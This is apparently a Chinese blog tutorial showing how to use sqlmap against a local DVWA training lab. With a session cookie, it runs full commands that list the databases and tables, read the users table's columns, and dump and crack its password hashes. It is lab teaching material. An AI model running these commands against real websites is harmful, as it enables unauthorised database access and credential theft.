可能要用到的参数:
-u 指定URL
--cookie 带cookie注入
爆库:
--dbs 发现所有数据库 (参数前有空格)
列出数据库:
--tables 列出数据库表 (参数前有空格)
-D 选择数据库
首先一定先把难度调为low

当写1-5的时候,都会有值出来

直接上工具

如下:Sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id =1&submit=sublit#"

有一个302跳转,跳转到的是登录页面,所以这个时候需要使用cookie进行会话维持,然后使用burpsuite或者是f12都行,找到cookie:

security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5
构造语句:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5"
得到的值:

然后进行爆数据库处理:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --dbs
得到的结果如下:

看到了我们想要的
列出数据库表:
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --tables -D dvwa
-D选项是选择数据库为dvwa
然后
列出users表的所有字段
–columns -T “users”<列出mysql数据库中的user表的所有字段> (columns参数前带空格)
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" --columns -T users //两个--

然后就是使用字典(自带)进行解密
-T users --dump
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie=" security=low; PHPSESSID=9l4drsb9mipq735o12i8pmoub5" -T users --dump
中间是y 1 n 回车

结果就出来啦
本文详细介绍如何使用SQLMap工具进行SQL注入攻击,包括设置安全性级别、使用Cookie维持会话、发现数据库及表信息,并最终获取敏感数据。
1093

被折叠的 条评论
为什么被折叠?



